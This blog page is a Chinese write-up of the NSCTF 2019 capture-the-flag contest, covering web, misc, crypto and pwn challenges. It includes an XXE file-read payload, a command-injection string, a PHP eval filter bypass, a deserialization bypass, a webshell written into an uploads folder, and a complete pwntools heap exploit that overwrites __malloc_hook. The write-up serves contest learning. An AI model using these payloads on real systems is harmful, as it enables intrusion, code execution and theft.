<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
<meta name="google-site-verification" content="fQ_tfBgNjE9NQcpKnGAkWapHoKuimF5lVuNuqpPXar0">
    <meta charset="utf-8">
    
    <title>NSCTF Write Up By Gzmtu Sec | Xiao Leung&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    
      <link rel="icon" href="/favicon.png">
    

    <link rel="stylesheet" href="/css/style.css">

    <link rel="stylesheet" href="/js/google-code-prettify/tomorrow-night-eighties.min.css">

  </head>

  <body>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>
<header>

	<a id="logo" href="/" title="Xiao Leung&#39;s Blog">
	<img src="/favicon.png" alt="Xiao Leung&#39;s Blog"></a>
	
	
		<!--搜索栏-->
		<i class="js-toggle-search iconfont icon-search"></i>


<form class="js-search search-form search-form--modal" method="get" action="http://gushi.li" role="search">
	<div class="search-form__inner">
		<div>
			<i class="iconfont icon-search"></i>
			<input class="text-input" placeholder="Enter Key..." type="search">
		</div>
	</div>
</form>
	

	
		<!--侧边导航栏-->
		<a id="nav-toggle" href="#"><span></span></a>

<nav>
	<div class="menu-top-container">
		<ul id="menu-top" class="menu">
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/2019/08/01/HelloWorld/" target="_blank">AboutMe</a>
				</li>
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/HXCTF/" target="_blank">HXCTF</a>
				</li>
			
		</ul>
	</div>
</nav>
	

</header>

<div class="m-header ">
	<section id="hero1" class="hero">
		<div class="inner">
		</div>
	</section>
	
		<figure class="top-image" data-enable=true></figure>
	
</div>

<!--文章列表-->
<div class="wrapper">
  
    <!--文章-->
<article>
	
  
    <h1 class="post-title" itemprop="name">
      NSCTF Write Up By Gzmtu Sec
    </h1>
  

	<div class='post-body mb'>
		<h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h3 id="小明又被拒绝了"><a href="#小明又被拒绝了" class="headerlink" title="小明又被拒绝了"></a>小明又被拒绝了</h3><p>这题比较简单，xff+改cookie</p>
<p>payload:</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15680897504108.png" alt="img"></p>
<h3 id="XX"><a href="#XX" class="headerlink" title="XX?"></a>XX?</h3><ul>
<li><p><strong>源码泄露</strong></p>
</li>
<li><p><a href="http://119.61.19.212:8083/index.php" target="_blank" rel="noopener">http://119.61.19.212:8083/index.php</a>~</p>
<pre><code class="php">&lt;?php
#鍏抽棴Warning
error_reporting(E_ALL^E_NOTICE^E_WARNING);

$xmlfile = file_get_contents(&#39;php://input&#39;);
$dom = new DOMDocument();
$dom-&gt;loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);

$creds = simplexml_import_dom($dom);
$user = $creds-&gt;user;
$pass = $creds-&gt;pass;

echo &quot;CTF:&quot; . &quot;&lt;br&gt;&quot; . &quot;$user&quot;;
?&gt;
</code></pre>
</li>
<li><p>xxe直接打，另外扫描到flag.php</p>
</li>
<li><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/1568090057222.png" alt="img"></p>
</li>
<li><p>PHP伪协议直接读flag</p>
<pre><code class="shell">GET /index.php HTTP/1.1
Host: 119.61.19.212:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=0
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Content-Length: 227
</code></pre>
</li>
</ul>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" ><p>]&gt;<br><creds><br><user>&xxe;</user><br><pass>&xxe;</pass><br></creds></p>
<pre><code>
![img](https://www.mycute.cn/static/umeditor/php/upload/20190910/15680912975437.png)

### 免费的,ping一下~

- Fuzz出来一个payload`a;id;`可以用

![img](https://www.mycute.cn/static/umeditor/php/upload/20190910/15680918202057.png)

-  ${IFS}绕过空格
-  pyload
</code></pre><p>baidu.coma;grep${IFS}-n${IFS}”fl”${IFS}/fla*; </p>
<pre><code>
### php

```php
&lt;?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
function GetYourFlag(){
    echo file_get_contents(&quot;./flag.php&quot;);
}

if(isset($_GET[&#39;code&#39;])){
    $code = $_GET[&#39;code&#39;];
    //print(strlen($code));
    if(strlen($code)&gt;27){ 
        die(&quot;Too Long.&quot;);
    }

    if(preg_match(&#39;/[a-zA-Z0-9_&amp;^&lt;&gt;&quot;\&#39;]+/&#39;,$_GET[&#39;code&#39;])) {
        die(&quot;Not Allowed.&quot;);
    }
    @eval($_GET[&#39;code&#39;]);
}else{
      highlight_file(__FILE__);
}
?&gt;</code></pre><ul>
<li>这道题和SUCTF2019的Ezphp类似。</li>
<li>直接使用脚本检测在这个正则下哪些字符可用。</li>
</ul>
<pre><code class="php">&lt;?php
for ($ascii = 0; $ascii &lt; 256; $ascii++) {
    if (!preg_match(&#39;/[\x00- 0-9A-Za-z\&#39;&quot;\`~_&amp;.,|=[\x7F]+/i&#39;, chr($ascii))) {
    //echo bin2hex(chr($ascii));
    echo chr($ascii);
    echo &quot;\n&quot;;
}
}
?&gt;</code></pre>
<ul>
<li>可以得知如下字符可用</li>
</ul>
<pre><code>! # $ % ( ) * + , - . / : ; = ? @ [ \ ] ` { | } ~  </code></pre><ul>
<li><p>构造payload，直接构造${_GET}{%a0();,绕过方法参考：<a href="https://www.freebuf.com/articles/web/186298.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/186298.html</a></p>
</li>
<li><pre><code class="php">&gt;&gt;echo bin2hex(~(&quot;_GET&quot;));
&gt;&gt;a0b8baab
转换为url编码再取反构造payload如下：
${~%a0%b8%ba%ab}{%a0}();&amp;%a0=GetYourFlag
</code></pre>
<p>读取flag</p>
</li>
<li><pre><code>&lt;?php
$flag=&quot;flag{3904c5df2e894ca02a21004feb21e617}&quot;
?&gt;</code></pre></li>
</ul>
<h3 id="API"><a href="#API" class="headerlink" title="API"></a>API</h3><ul>
<li>扫描目录从胡发现有个api目录，然后需要我们post提交一个filename而且是json格式的。经过一顿Fuzz出来一个<code>payload</code>可用：</li>
</ul>
<pre><code>filename={&quot;file&quot;:&quot;index.php&quot;}</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15680951435613.png" alt="img"></p>
<ul>
<li>尝试使用双url编码去绕过<code>stristr</code>均以失败告终，后面去读根目录下的<code>index.php</code>发现源码：</li>
</ul>
<pre><code class="php">&lt;?php
require_once(&#39;hack.php&#39;);
echo &quot;Api!wow&quot;;
function do_unserialize($value){
        preg_match(&#39;/[oc]:\d+:/i&#39;, $value, $matches);
        if (count($matches)) {return false;}
        return unserialize($value);
    }
$x = new hack();
if(isset($_GET[&#39;flag&#39;])) $g = $_GET[&#39;flag&#39;];
if (!empty($g)) {
    $x = do_unserialize($g);
}
echo $x-&gt;readfile();
?&gt;</code></pre>
<ul>
<li>源码可知可以它返序列化了一个类，而这个类在<code>hack.php</code>，于是读取<code>hack.php</code></li>
</ul>
<pre><code class="php">&lt;?php
    class hack {
        public $file;
        function __construct($filename = &#39;&#39;) {
            $this -&gt; file = $filename;
        }

        function readfile() {
            if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&#39;..&#39;)===FALSE
            &amp;&amp; stripos($this-&gt;file,&#39;/&#39;)===FALSE &amp;&amp; stripos($this-&gt;file,&#39;\\&#39;)==FALSE) {
                return @file_get_contents($this-&gt;file);
            }
        }
    }
    //fffffaa_not.php
?&gt;</code></pre>
<ul>
<li>直接可以知，反序列化需要我们去读取<code>fffffaa_not.php</code>(直接读取flag不行，因为不知道flag的文件名)</li>
</ul>
<pre><code class="php">  &lt;?php
  class hack {
      public $file;
      function __construct($filename = &#39;&#39;) {
          $this -&gt; file = $filename;
      }

      function readfile() {
          if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&#39;..&#39;)===FALSE
          &amp;&amp; stripos($this-&gt;file,&#39;/&#39;)===FALSE &amp;&amp; stripos($this-&gt;file,&#39;\\&#39;)==FALSE) {
              return @file_get_contents($this-&gt;file);
        }
      }
      }
$a= new hack(&#39;fffffaa_not.php&#39;);
  echo serialize($a);
  //O:4:&quot;hack&quot;:1:{s:4:&quot;file&quot;;s:15:&quot;fffffaa_not.php&quot;;}
  ?&gt;</code></pre>
<ul>
<li>这里又遇到了问题，在hack.php过滤了<code>O:数字</code>,这里直接用加号当做空格绕过。</li>
</ul>
<pre><code>O:+4:&quot;hack&quot;:1:{s:4:&quot;file&quot;;s:15:&quot;fffffaa_not.php&quot;;}</code></pre><ul>
<li>然后读取到<code>fffffaa_not.php</code>源码：</li>
</ul>
<pre><code class="php">&lt;?php
$text = $_GET[&#39;jhh08881111jn&#39;];
$filename = $_GET[&#39;file_na&#39;];
if(preg_match(&#39;[&lt;&gt;?]&#39;, $text)) {
    die(&#39;error!&#39;);
}
if(is_numeric($filename)){
    $path=&quot;/var/www/html/uploads/&quot;.$filename.&quot;.php&quot;;
}else{
    die(&#39;error&#39;);
}
file_put_contents($path, $text);
?&gt;</code></pre>
<ul>
<li><p>这里preg_match()可以直接绕过,使用数组bypass(<a href="https://bugs.php.net/bug.php?id=69274" target="_blank" rel="noopener">Bug #69274</a>)</p>
</li>
<li><p>这样直接构造payload，在uploads文件下生成一个一句话木马。</p>
</li>
</ul>
<pre><code>fffffaa_not.php?jhh08881111jn[]=%3C?php%20@eval($_POST[%27sb%27]);?%3E&amp;file_na=110114</code></pre><ul>
<li>上菜刀在根目录下直接读取flag</li>
</ul>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15680963492951.png" alt="img"></p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h3 id="完美的错误"><a href="#完美的错误" class="headerlink" title="完美的错误"></a>完美的错误</h3><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681011438130.png" alt="img"></p>
<p>尝试多次发现base58将表移位</p>
<p>脚本:</p>
<pre><code class="python">import base58

old_base58_table = [&#39;1&#39;,&#39;2&#39;,&#39;3&#39;,&#39;4&#39;,&#39;5&#39;,&#39;6&#39;,&#39;7&#39;,&#39;8&#39;,&#39;9&#39;,

&#39;A&#39;,&#39;B&#39;,&#39;C&#39;,&#39;D&#39;,&#39;E&#39;,&#39;F&#39;,&#39;G&#39;,&#39;H&#39;,&#39;J&#39;,&#39;K&#39;,&#39;L&#39;,&#39;M&#39;,&#39;N&#39;,&#39;P&#39;,

&#39;Q&#39;,&#39;R&#39;,&#39;S&#39;,&#39;T&#39;,&#39;U&#39;,&#39;V&#39;,&#39;W&#39;,&#39;X&#39;,&#39;Y&#39;,&#39;Z&#39;,&#39;a&#39;,&#39;b&#39;,

&#39;c&#39;,&#39;d&#39;,&#39;e&#39;,&#39;f&#39;,&#39;g&#39;,&#39;h&#39;,&#39;i&#39;,&#39;j&#39;,&#39;k&#39;,&#39;m&#39;,&#39;n&#39;,

&#39;o&#39;,&#39;p&#39;,&#39;q&#39;,&#39;r&#39;,&#39;s&#39;,&#39;t&#39;,&#39;u&#39;,&#39;v&#39;,&#39;w&#39;,&#39;x&#39;,&#39;y&#39;,&#39;z&#39;]

target=&quot;RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX&quot;

s=&quot;&quot;

for i in range(len(old_base58_table)):

    s=&quot;&quot;

    new_base58_table=old_base58_table[:]

    for j in range(len(old_base58_table)):

        new_base58_table[j] = old_base58_table[(j+i)%len(old_base58_table)]

    for k in target:

            s+=old_base58_table[new_base58_table.index(k)]

    if &#39;flag&#39; in base58.b58decode(s):

        print base58.b58decode(s)    </code></pre>
<h3 id="抓灰阔"><a href="#抓灰阔" class="headerlink" title="抓灰阔"></a>抓灰阔</h3><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/1568102716733.png" alt="img"></p>
<p>用wireshark导出http文件发现main(13)与main.jsp%3fpass=281文件有AES的密文密钥</p>
<p>扔去网站解密</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681012317855.png" alt="img"></p>
<p>发现提示，将后面内容复制base64解密转存发现是个ELF文件但是文件头不齐，将文件头补齐后，拉入ida分析</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681013133626.png" alt="img"></p>
<p>将指定字符串输入后得到flag</p>
<pre><code>oo8?989j5i8;jh8&gt;;:=8n;ij:mij8;o4&quot;</code></pre><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681027436525.png" alt="img"><br>题目已经提示了开头的字符，虽然生成了两个随机字符串，但是新生成的字符串是由前一个字符串异或得到，通过开头字符可求得随机字符串key。</p>
<p>脚本:</p>
<pre><code class="python">import os
from Crypto.Util.number import long_to_bytes,bytes_to_long

f=open(&quot;flag.txt.encrypted&quot;, &quot;rb&quot;)
fmessage = f.read()
message=&quot;have a good time.&quot;
key = os.urandom(8)
iv = os.urandom(8)
count = 8
filemessage1= []
filemessage2= []
def decode():
    for i in range(8):
        filemessage1.append(bytes_to_long(fmessage[i*8:i*8+8]))
        filemessage2.append(bytes_to_long(fmessage[i*8:i*8+8]))
    for i in range(7):
            filemessage2[i+1] = filemessage1[i] ^ filemessage2[i+1]
            final=long_to_bytes(filemessage2[1])
    for i in range(8):
        for j in range(255):
            if ord(final[i]) ^ j == ord(message[i+8]):
                key = hex(j)  
    key = &#39;\xf7\x53\xc1\x24\x9c\x49\x73\x18&#39;
    print long_to_bytes(bytes_to_long(key)^filemessage2[2])
    +long_to_bytes(bytes_to_long(key)^filemessage2[3])
    +long_to_bytes(bytes_to_long(key)^filemessage2[4])
    +long_to_bytes(bytes_to_long(key)^filemessage2[5])
    +long_to_bytes(bytes_to_long(key)^filemessage2[6])
decode()</code></pre>
<h3 id="脑筋急转弯"><a href="#脑筋急转弯" class="headerlink" title="脑筋急转弯"></a>脑筋急转弯</h3><p>这题是一道音频隐写的题目，用silenteye提取出文件</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681233241246.png" alt="img"></p>
<p>发现该压缩包有密码，于是用Ziperello破解</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681233775303.png" alt="img"></p>
<p>解压出来是012的文件</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681234098452.png" alt="img"></p>
<p>由该题目的标题联想到brainfuck的语言，于是将0转成  .  将1转成 ! 将2转成?</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681234389077.png" alt="img"></p>
<p>于是用<a href="https://www.splitbrain.org/services/ook在线转换" target="_blank" rel="noopener">https://www.splitbrain.org/services/ook在线转换</a></p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681234757302.png" alt="img"></p>
<p><strong>flag{08277716193eda6c592192966e9d6f39}</strong></p>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h3 id="Pwn1"><a href="#Pwn1" class="headerlink" title="Pwn1"></a>Pwn1</h3><p>一开始拿着2.23的libc埋头做，利用条件竞争加上unsorted bin attack改fastbin的最大限制，free的时候所有的chunk都可以进入fastbin，但是改了之后unsorted bin坏了，因为创建进程要0x120的空间，所以就不能用条件竞争改fastbin的fd，那时候想了好久如何绕过这个限制，后来libc换成2.27的时候就容易多了，先free 7个chunk进入tcache将其填满，然后再free进入unsorted bin，利用run函数泄露内存，接着直接用条件竞争该tcache的fd为malloc hook的位置就行了，因为2.27的版本下没有过多的检查，然后将malloc hook改成one_gadget，最后malloc的时候会调用malloc hook的函数，执行one_gadget。</p>
<pre><code>from pwn import*
context.log_level=True
#p=process(&#39;./qw_pwn1&#39;)
p=remote(&#39;119.61.19.212&#39;,8087)
elf=ELF(&#39;qw_pwn1&#39;)
libc=ELF(&#39;libc.so.6&#39;)


def add(id,x):
    p.recvuntil(&#39;3.run\n&#39;)
    p.sendline(&#39;1&#39;)
    p.recvuntil(&#39;index:\n&#39;)
    p.sendline(str(id))
    p.recvuntil(&#39;content:\n&#39;)
    p.send(x)
def add1(id,x):

    p.sendline(&#39;1&#39;)
    p.recvuntil(&#39;index:\n&#39;)
    p.sendline(str(id))
    p.recvuntil(&#39;content:\n&#39;)
    p.send(x)

def free(id):
    p.recvuntil(&#39;3.run\n&#39;)
    p.sendline(&#39;2&#39;)
    p.recvuntil(&#39;index:\n&#39;)
    p.sendline(str(id))
def free1(id):

    p.sendline(&#39;2&#39;)
    p.recvuntil(&#39;index:\n&#39;)
    p.sendline(str(id))    
def run(id,key):
    p.recvuntil(&#39;3.run\n&#39;)
    p.sendline(&#39;3&#39;)
    p.recvuntil(&#39;index:\n&#39;)
    p.sendline(str(id))
    p.recvuntil(&#39;input key:\n&#39;)
    p.sendline(str(key))
add(0,&#39;\0&#39;*0xa0)
add(1,&#39;b&#39;*0x8+p64(0xb1))
add(2,&#39;\0&#39;*0xa0)
add1(3,&#39;\0&#39;*0xa0)
add(4,&#39;\0&#39;*0xa0)
add(5,&#39;\0&#39;*0xa0)
add(6,&#39;\0&#39;*0xa0)
add(7,&#39;\0&#39;*0xa0)
add(8,&#39;\0&#39;*0xa0)
add(9,&#39;\0&#39;*0xa0)

free(1)
free(2)
free(3)
free(4)
free(5)
free(6)
free(7)


free(0)
add(7,&#39;b&#39;*0x8+p64(0xb1))
add(6,&#39;\0&#39;*0xa0)
add1(5,&#39;\0&#39;*0xa0)
add(4,&#39;\0&#39;*0xa0)
add(3,&#39;\0&#39;*0xa0)
add(2,&#39;\0&#39;*0xa0)
add(1,&#39;\0&#39;*0xa0)

add(0,&#39;a&#39;*8)

run(0,0)
p.recvuntil(&#39;a&#39;*8)
libcbase=u64(p.recv(6).ljust(8,&#39;\x00&#39;))-(0x00007ffff7bb0ca0-0x00007ffff77c5000)
print hex(libcbase)

malloc=libcbase+libc.symbols[&#39;__malloc_hook&#39;]
print hex(malloc)
one=libcbase+0x4f322

#malloc=(malloc-0x13) &amp; 0xffff


#key=malloc^(malloc+0x70)
#key=key&amp;0xffff


p.sendline(&#39;3&#39;)
p.recvuntil(&#39;index:\n&#39;)
p.sendline(str(0))

p.recvuntil(&#39;input key:\n&#39;)

p.sendline(str(malloc-0x13))

free(0)
sleep(3)

p.recvuntil(&#39;done\n&#39;)

add1(11,&#39;\0&#39;*0xa0)
add(12,&#39;a&#39;*0x13+p64(one))
#gdb.attach(p)
#raw_input()

p.recvuntil(&#39;3.run\n&#39;)
p.sendline(&#39;1&#39;)
p.recvuntil(&#39;index:\n&#39;)
p.sendline(str(13))
p.interactive()

</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190910/15681235096326.png" alt="img"></p>
<p><strong>flag{85B367076A1B7177F0F2945DA9DFE599}</strong></p>

	</div>
	<div class="meta split">
		
			<span>本文总阅读量 <span id="busuanzi_value_page_pv"></span> 次</span>
		
		<time class="post-date" datetime="2019-09-10T14:12:48.000Z" itemprop="datePublished">2019-09-10</time>
	</div>
</article>

<!--评论-->

	
<div class="ds-thread" data-thread-key="NSCTFWP " data-title="NSCTF Write Up By Gzmtu Sec" data-url="http://www.plasf.cn/2019/09/10/NSCTFWP /"></div>
<script type="text/javascript">

var duoshuoQuery = {short_name:"yumemor"};
	(function() {
		var ds = document.createElement('script');
		ds.type = 'text/javascript';ds.async = true;
		ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
		ds.charset = 'UTF-8';
		(document.getElementsByTagName('head')[0]
		 || document.getElementsByTagName('body')[0]).appendChild(ds);
	})();
</script>


  
</div>


  <svg id="bigTriangleColor" width="100%" height="40" viewBox="0 0 100 102" preserveAspectRatio="none">
    <path d="M0 0 L50 100 L100 0 Z"></path>
  </svg>

  


  <div class="wrapper"></div>





<div class="fat-footer">
	<div class="wrapper">
		<div class="layout layout--center">
			<div class="layout__item palm-mb">
				<div class="media">
					<img class="headimg" src='/assets/blogImg/litten.png' alt='XiaoLeung'>
					<div class="media__body">
						<h4>兵至如归-Xiaoleung&#39;s Blog</h4>
						<p class='site-description'>Don&#39;t forget why we started</p>
					</div>
				</div>
				<div class="author-contact">
					<ul>
						
							
							<li>
				        		<a href="https://github.com/sharpleung" target="_blank">
				        			
				        				<i class="iconfont icon-github"></i>
				        			
				        		</a>
				        	</li>
						
					</ul>
				</div>
			</div>
		</div>
	</div>
</div>

<footer class="footer" role="contentinfo">
	<div class="wrapper wrapper--wide split split--responsive">
<a href="http://beian.miit.gov.cn/">粤ICP备18132442号-1</a><br>
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="http://beian.gov.cn/img/ghs.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">粤公网安备 44011202000643号</p></a><br>

		
			<span>本站总访问量 <span id="busuanzi_value_site_pv"></span> 次, 访客数 <span id="busuanzi_value_site_uv"></span> 人次</span>
		
		<span>Theme by <a href="http://github.com/justpsvm">justpsvm</a>. Powered by <a href="http://hexo.io">Hexo</a></span>
	</div>
</footer>

	<!-－这里导入了 lib.js 里面涵盖了 jQuery 等框架 所以注释掉-->
	<!--<script src="http://lib.sinaapp.com/js/jquery/2.0/jquery.min.js"></script>-->
	<script src="/js/lib.js"></script>
	<script src="/js/google-code-prettify/prettify.js"></script>
	<script src="/js/module.js"></script>
	<script src="/js/script.js"></script>
	
		<script async src="http://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	
	<script type='text/javascript'>
		//代码高亮
		$(document).ready(function(){
	 		$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
   			prettyPrint();
		});
	</script>
	<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
 <script type="text/javascript"> /* 鼠标点击特效 - 7Core.CN */ var a_idx = 0;jQuery(document).ready(function($) {$("body").click(function(e) {var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善");var $i = $("<span/>").text(a[a_idx]); a_idx = (a_idx + 1) % a.length;var x = e.pageX,y = e.pageY;$i.css({"z-index": 100000000,"top": y - 20,"left": x,"position": "absolute","font-weight": "bold","color": "#ff6651"});$("body").append($i);$i.animate({"top": y - 180,"opacity": 0},1500,function() {$i.remove();});});}); </script>

